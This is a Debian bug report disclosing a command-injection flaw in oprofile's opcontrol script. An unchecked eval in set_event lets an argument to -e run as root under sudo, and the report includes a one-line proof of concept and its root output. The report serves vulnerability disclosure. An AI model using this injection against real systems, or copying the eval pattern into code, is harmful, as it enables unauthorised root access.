Package: oprofile
Version: 0.9.6-1.1
I found a way to execute arbitrary commands when using opcontrol via
sudo. I realize that sudoing shell scripts is a bad idea (the oprofile
FAQ discourages the use of sudo) but sudo is nevertheless a common
advice on internet to provide oprofile to a user without giving him full
root-access.
The problem is in the set_event function where the content of $2 is not
checked.
set_event()
{
eval "CHOSEN_EVENTS_$1=$2"
}
This error can be exploited by injecting commands via the -e option as
in the following example:
$ sudo opcontrol -e "abcd;/usr/bin/id"
uid=0(root) gid=0(root) groups=0(root)
No such event "abcd"
This is a different vulnerability than
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0576
--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
